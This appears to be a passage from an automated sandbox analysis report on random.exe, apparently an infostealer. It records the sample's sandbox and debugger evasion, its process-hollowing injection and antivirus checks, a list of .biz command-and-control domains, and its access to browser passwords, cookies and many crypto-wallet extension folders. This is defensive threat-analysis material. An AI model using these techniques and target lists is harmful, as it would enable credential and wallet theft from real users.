        barindex
        Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\Desktop\random.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeMemory allocated: D60000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\random.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\random.exeMemory allocated: 46E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\random.exe TID: 2920Thread sleep time: -90000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\random.exe TID: 2920Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: Amcache.hve.6.drBinary or memory string: VMware
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: random.exe, 00000003.00000002.2243498920.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: random.exe, 00000003.00000002.2243498920.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF-
        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
        Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: random.exe, 00000003.00000002.2243476152.0000000000D92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@U
        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\random.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004402D0 LdrInitializeThunk,3_2_004402D0
        Source: C:\Users\user\Desktop\random.exeCode function: 0_2_026E7E85 mov edi, dword ptr fs:[00000030h]0_2_026E7E85
        Source: C:\Users\user\Desktop\random.exeCode function: 0_2_026E8002 mov edi, dword ptr fs:[00000030h]0_2_026E8002
        Source: C:\Users\user\Desktop\random.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\random.exeCode function: 0_2_026E7E85 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_026E7E85
        Source: C:\Users\user\Desktop\random.exeMemory written: C:\Users\user\Desktop\random.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: truculengisau.biz
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: spookycappy.biz
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: punishzement.biz
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nuttyshopr.biz
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: marketlumpe.biz
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: littlenotii.biz
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grandiouseziu.biz
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fraggielek.biz
        Source: random.exe, 00000000.00000002.2225328258.00000000036E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: owerinternal.sbs
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"Jump to behavior
        Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Users\user\Desktop\random.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000003.00000002.2244277691.00000000035C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
        Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
        Source: random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3g
        Source: random.exe, 00000003.00000002.2243648609.0000000000DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
